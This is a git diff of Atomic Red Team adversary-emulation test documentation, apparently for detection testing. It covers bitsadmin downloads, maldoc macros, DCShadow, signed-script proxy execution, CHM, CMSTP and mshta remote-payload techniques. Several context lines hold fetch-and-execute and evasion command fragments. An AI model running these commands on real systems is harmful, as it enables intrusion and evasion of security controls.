## Atomic Test #2 - Bitsadmin Download (PowerShell) - -auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc - This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell Upon execution you will find a github markdown file downloaded to the Temp directory + **Supported Platforms:** Windows +**auto_generated_guid:** f63b8bc4-07e5-4112-acba-56f646f3f0bc + + + #### Inputs: @@ -98,16 +102,18 @@ Remove-Item #{local_file} -ErrorAction Ignore
## Atomic Test #3 - Persist, Download, & Execute - -auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae - This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. + **Supported Platforms:** Windows +**auto_generated_guid:** 62a06ec5-5754-47d2-bcfc-123d8314c6ae + + + #### Inputs: @@ -144,16 +150,18 @@ del #{local_file} >nul 2>&1
## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) - -auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 - This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ + **Supported Platforms:** Windows +**auto_generated_guid:** afb5e09e-e385-4dee-9a94-6ee60979d114 + + + #### Inputs: diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index 9ed98eb9..e2953cf8 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -24,13 +24,15 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
## Atomic Test #1 - Examine password complexity policy - Ubuntu - -auto_generated_guid: 085fe567-ac84-47c7-ac4c-2688ce28265b - Lists the password complexity policy to console on Ubuntu Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 085fe567-ac84-47c7-ac4c-2688ce28265b + + + @@ -50,13 +52,15 @@ cat /etc/pam.d/common-password
## Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x - -auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d - Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 78a12e65-efff-4617-bc01-88f17d71315d + + + @@ -88,13 +92,15 @@ echo Please run from CentOS or RHEL v7
## Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x - -auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 - Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 6ce12552-0adb-4f56-89ff-95ce268f6358 + + + @@ -127,13 +133,15 @@ echo Please run from CentOS or RHEL v6
## Atomic Test #4 - Examine password expiration policy - All Linux - -auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a - Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. + **Supported Platforms:** Linux +**auto_generated_guid:** 7c86c55c-70fa-4a05-83c9-3aa19b145d1a + + + @@ -153,13 +161,15 @@ cat /etc/login.defs
## Atomic Test #5 - Examine local password policy - Windows - -auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 - Lists the local password policy to console on Windows. + **Supported Platforms:** Windows +**auto_generated_guid:** 4588d243-f24e-4549-b2e3-e627acc089f6 + + + @@ -179,13 +189,15 @@ net accounts
## Atomic Test #6 - Examine domain password policy - Windows - -auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 - Lists the domain password policy to console on Windows. + **Supported Platforms:** Windows +**auto_generated_guid:** 46c2c362-2679-4ef5-aec9-0e958e135be4 + + + @@ -205,13 +217,15 @@ net accounts /domain
## Atomic Test #7 - Examine password policy - macOS - -auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 - Lists the password policy to console on macOS. + **Supported Platforms:** macOS +**auto_generated_guid:** 4b7fa042-9482-45e1-b348-4b756b2a0742 + + + diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md index 3c32944b..fb234e50 100644 --- a/atomics/T1202/T1202.md +++ b/atomics/T1202/T1202.md @@ -16,15 +16,17 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
## Atomic Test #1 - Indirect Command Execution - pcalua.exe - -auto_generated_guid: cecfea7a-5f03-4cdd-8bc8-6f7c22862440 - The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) Upon execution, calc.exe should open + **Supported Platforms:** Windows +**auto_generated_guid:** cecfea7a-5f03-4cdd-8bc8-6f7c22862440 + + + #### Inputs: @@ -51,16 +53,18 @@ pcalua.exe -a #{payload_path}
## Atomic Test #2 - Indirect Command Execution - forfiles.exe - -auto_generated_guid: 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc - forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md) "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" Upon execution calc.exe will be opened + **Supported Platforms:** Windows +**auto_generated_guid:** 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc + + + #### Inputs: @@ -86,15 +90,17 @@ forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe
## Atomic Test #3 - Indirect Command Execution - conhost.exe - -auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 - conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer. Executing it through command line can create process ancestry anomalies [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/) + **Supported Platforms:** Windows +**auto_generated_guid:** cf3391e0-b482-4b02-87fc-ca8362269b29 + + + #### Inputs: diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index e5bc2484..f9bf6006 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -28,17 +28,19 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
## Atomic Test #1 - OSTap Style Macro Execution - -auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff - This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns. References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader + **Supported Platforms:** Windows +**auto_generated_guid:** 8bebc690-18c7-4549-bc98-210f7019efff + + + #### Inputs: @@ -88,13 +90,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #2 - OSTap Payload Download - -auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 - Uses cscript //E:jscript to download a file + **Supported Platforms:** Windows +**auto_generated_guid:** 3f3af983-118a-4fa1-85d3-ba4daa739d80 + + + #### Inputs: @@ -125,14 +129,16 @@ del #{script_file} /F /Q >nul 2>&1
## Atomic Test #3 - Maldoc choice flags command execution - -auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 - This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + **Supported Platforms:** Windows +**auto_generated_guid:** 0330a5d2-a45a-4272-a9ee-e364411c4b18 + + + #### Inputs: @@ -177,14 +183,16 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #4 - OSTAP JS version - -auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911 - Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + **Supported Platforms:** Windows +**auto_generated_guid:** add560ef-20d6-4011-a937-2c340f930911 + + + #### Inputs: @@ -230,13 +238,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #5 - Office launching .bat file from AppData - -auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa - Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 9215ea92-1ded-41b7-9cd6-79f9a78397aa + + + #### Inputs: @@ -282,18 +292,20 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - Excel 4 Macro - -auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 - This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious" VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec. A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated with Excel matches that of the local system. This username can be found under Files -> Options -> Username + **Supported Platforms:** Windows +**auto_generated_guid:** 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 + + + #### Inputs: @@ -392,15 +404,17 @@ Write-Host "You will need to install Microsoft Excel manually to meet this requi
## Atomic Test #7 - Headless Chrome code execution via VBA - -auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a - This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver and pull down the script and execute it. By default the payload will execute calc.exe on the system. + **Supported Platforms:** Windows +**auto_generated_guid:** a19ee671-ed98-4e9d-b19c-d1954a51585a + + + @@ -449,13 +463,15 @@ Write-Host "You will need to install Google Chrome manually to meet this require
## Atomic Test #8 - Potentially Unwanted Applications (PUA) - -auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 - The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + **Supported Platforms:** Windows +**auto_generated_guid:** 02f35d62-9fdc-4a97-b899-a5d9a876d295 + + + #### Inputs: diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index 8c22bc80..a93d1f53 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -14,9 +14,6 @@ This technique may bypass system logging and security monitors such as security
## Atomic Test #1 - DCShadow - Mimikatz - -auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 - Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) @@ -27,9 +24,14 @@ Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | sel Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. The easiest is to run elevated and as a Domain Admin user. + **Supported Platforms:** Windows +**auto_generated_guid:** 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 + + + #### Inputs: diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md index 66a7732e..90da7ee0 100644 --- a/atomics/T1216.001/T1216.001.md +++ b/atomics/T1216.001/T1216.001.md @@ -12,13 +12,15 @@
## Atomic Test #1 - PubPrn.vbs Signed Script Bypass - -auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c - Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. + **Supported Platforms:** Windows +**auto_generated_guid:** 9dd29a1f-1e16-4862-be83-913b10a88f6c + + + #### Inputs: diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index c73cfd7b..75554d61 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -12,14 +12,16 @@
## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution - -auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb - Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 275d963d-3f36-476c-8bef-a2a3960ee6eb + + + #### Inputs: @@ -44,13 +46,15 @@ C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
## Atomic Test #2 - manage-bde.wsf Signed Script Command Execution - -auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a - Executes the signed manage-bde.wsf script with options to execute an arbitrary command. + **Supported Platforms:** Windows +**auto_generated_guid:** 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a + + + #### Inputs: diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index a7ef7b04..19cac217 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -26,13 +26,15 @@ Specific storage locations vary based on platform and/or application, but browse
## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on Linux - -auto_generated_guid: 3a41f169-a5ab-407f-9269-abafdb5da6c2 - Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. + **Supported Platforms:** Linux +**auto_generated_guid:** 3a41f169-a5ab-407f-9269-abafdb5da6c2 + + + #### Inputs: @@ -62,13 +64,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #2 - List Mozilla Firefox Bookmark Database Files on macOS - -auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b - Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. + **Supported Platforms:** macOS +**auto_generated_guid:** 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b + + + #### Inputs: @@ -98,13 +102,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #3 - List Google Chrome Bookmark JSON Files on macOS - -auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc - Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. + **Supported Platforms:** macOS +**auto_generated_guid:** b789d341-154b-4a42-a071-9111588be9bc + + + #### Inputs: @@ -134,14 +140,16 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell - -auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 - Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** faab755e-4299-48ec-8202-fc7885eb6545 + + + @@ -161,14 +169,16 @@ Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyCo
## Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt - -auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 - Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 76f71e2f-480e-4bed-b61e-398fe17499d5 + + + @@ -188,14 +198,16 @@ where /R C:\Users\ Bookmarks
## Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt - -auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 - Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 4312cdbc-79fc-4a9c-becc-53d49c734bc5 + + + @@ -215,13 +227,15 @@ where /R C:\Users\ places.sqlite
## Atomic Test #7 - List Internet Explorer Bookmarks using the command prompt - -auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 - This test will list the bookmarks for Internet Explorer that are found in the Favorites folder + **Supported Platforms:** Windows +**auto_generated_guid:** 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 + + + diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md index a76fe782..270b1aa0 100644 --- a/atomics/T1218.001/T1218.001.md +++ b/atomics/T1218.001/T1218.001.md @@ -24,14 +24,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th
## Atomic Test #1 - Compiled HTML Help Local Payload - -auto_generated_guid: 5cb87818-0d7c-4469-b7ef-9224107aebe8 - Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open + **Supported Platforms:** Windows +**auto_generated_guid:** 5cb87818-0d7c-4469-b7ef-9224107aebe8 + + + #### Inputs: @@ -69,14 +71,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Compiled HTML Help Remote Payload - -auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d - Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution displays an error saying the file cannot be open + **Supported Platforms:** Windows +**auto_generated_guid:** 0f8af516-9818-4172-922b-42986ef1e81d + + + #### Inputs: @@ -101,13 +105,15 @@ hh.exe #{remote_chm_file}
## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution - -auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 - Executes a CHM file with the default Shortcut Command method. + **Supported Platforms:** Windows +**auto_generated_guid:** 29d6f0d7-be63-4482-8827-ea77126c1ef7 + + + #### Inputs: @@ -147,13 +153,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler - -auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 - Executes a CHM file with the ITS protocol handler. + **Supported Platforms:** Windows +**auto_generated_guid:** b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + + + #### Inputs: @@ -194,13 +202,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke CHM Simulate Double click - -auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a - Executes a CHM file simulating a user double click. + **Supported Platforms:** Windows +**auto_generated_guid:** 5decef42-92b8-4a93-9eb2-877ddcb9401a + + + #### Inputs: @@ -239,13 +249,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic - -auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 - Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. + **Supported Platforms:** Windows +**auto_generated_guid:** 4f83adda-f5ec-406d-b318-9773c9ca92e5 + + + #### Inputs: @@ -288,13 +300,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic - -auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 - Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. + **Supported Platforms:** Windows +**auto_generated_guid:** 15756147-7470-4a83-87fb-bb5662526247 + + + #### Inputs: diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md index 831bf542..95b2ed09 100644 --- a/atomics/T1218.002/T1218.002.md +++ b/atomics/T1218.002/T1218.002.md @@ -16,14 +16,16 @@ Adversaries may also rename malicious DLL files (.dll) with Control Panel file e
## Atomic Test #1 - Control Panel Items - -auto_generated_guid: 037e9d8a-9e46-4255-8b33-2ae3b545ca6f - This test simulates an adversary leveraging control.exe Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** 037e9d8a-9e46-4255-8b33-2ae3b545ca6f + + + #### Inputs: diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md index 4cd4cfd9..57adcbec 100644 --- a/atomics/T1218.003/T1218.003.md +++ b/atomics/T1218.003/T1218.003.md @@ -16,13 +16,15 @@ CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mit
## Atomic Test #1 - CMSTP Executing Remote Scriptlet - -auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624 - Adversaries may supply CMSTP.exe with INF files infected with malicious commands + **Supported Platforms:** Windows +**auto_generated_guid:** 34e63321-9683-496b-bbc1-7566bc55e624 + + + #### Inputs: @@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - CMSTP Executing UAC Bypass - -auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 - Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file + **Supported Platforms:** Windows +**auto_generated_guid:** 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 + + + #### Inputs: diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md index d30c0256..52a9a6bb 100644 --- a/atomics/T1218.004/T1218.004.md +++ b/atomics/T1218.004/T1218.004.md @@ -26,14 +26,16 @@ InstallUtil may also be used to bypass application control through use of attrib
## Atomic Test #1 - CheckIfInstallable method call - -auto_generated_guid: ffd9c807-d402-47d2-879d-f915cf2a3a94 - Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed. If no output is displayed the test executed successfuly. + **Supported Platforms:** Windows +**auto_generated_guid:** ffd9c807-d402-47d2-879d-f915cf2a3a94 + + + #### Inputs: @@ -104,14 +106,16 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - InstallHelper method call - -auto_generated_guid: d43a5bde-ae28-4c55-a850-3f4c80573503 - Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test executed successfuly. + **Supported Platforms:** Windows +**auto_generated_guid:** d43a5bde-ae28-4c55-a850-3f4c80573503 + + + #### Inputs: @@ -184,13 +188,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - InstallUtil class constructor method call - -auto_generated_guid: 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 - Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 + + + #### Inputs: @@ -263,13 +269,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InstallUtil Install method call - -auto_generated_guid: 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b - Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b + + + #### Inputs: @@ -342,13 +350,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant - -auto_generated_guid: 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b - Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b + + + #### Inputs: @@ -421,13 +431,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant - -auto_generated_guid: 06d9deba-f732-48a8-af8e-bdd6e4d98c1d - Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 06d9deba-f732-48a8-af8e-bdd6e4d98c1d + + + #### Inputs: @@ -500,13 +512,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - InstallUtil HelpText method call - -auto_generated_guid: 5a683850-1145-4326-a0e5-e91ced3c6022 - Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. + **Supported Platforms:** Windows +**auto_generated_guid:** 5a683850-1145-4326-a0e5-e91ced3c6022 + + + #### Inputs: @@ -579,14 +593,16 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #8 - InstallUtil evasive invocation - -auto_generated_guid: 559e6d06-bb42-4307-bff7-3b95a8254bad - Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation." will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion. + **Supported Platforms:** Windows +**auto_generated_guid:** 559e6d06-bb42-4307-bff7-3b95a8254bad + + + #### Inputs: diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 420c1301..8682f1e1 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -34,13 +34,15 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject - -auto_generated_guid: 1483fab9-4f52-4217-a9ce-daa9d7747cae - Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 1483fab9-4f52-4217-a9ce-daa9d7747cae + + + #### Inputs: @@ -65,15 +67,17 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
## Atomic Test #2 - Mshta executes VBScript to execute malicious command - -auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095 - Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information. + **Supported Platforms:** Windows +**auto_generated_guid:** 906865c3-e05f-4acc-85c4-fbc185455095 + + + @@ -93,13 +97,15 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) - -auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45 - Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** c4b97eeb-5249-4455-a607-59f95485cb45 + + + #### Inputs: @@ -131,13 +137,15 @@ remove-item "#{temp_file}" -ErrorAction Ignore
## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement - -auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 - Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. + **Supported Platforms:** Windows +**auto_generated_guid:** 007e5672-2088-4853-a562-7490ddc19447 + + + #### Inputs: @@ -178,13 +186,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click - -auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 - Executes an HTA Application using JScript script engine simulating double click. + **Supported Platforms:** Windows +**auto_generated_guid:** 58a193ec-131b-404e-b1ca-b35cf0b18c33 + + + #### Inputs: @@ -224,13 +234,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke HTML Application - Direct download from URI - -auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db - Executes an HTA Application by directly downloading from remote URI. + **Supported Platforms:** Windows +**auto_generated_guid:** 39ceed55-f653-48ac-bd19-aceceaf525db + + + #### Inputs: @@ -270,13 +282,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler - -auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af - Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. + **Supported Platforms:** Windows +**auto_generated_guid:** e7e3a525-7612-4d68-a5d3-c4649181b8af + + + #### Inputs: @@ -317,13 +331,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler - -auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 - Executes an HTA Application with JScript Engine and Inline Protocol Handler. + **Supported Platforms:** Windows +**auto_generated_guid:** d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + + + #### Inputs: @@ -364,13 +380,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
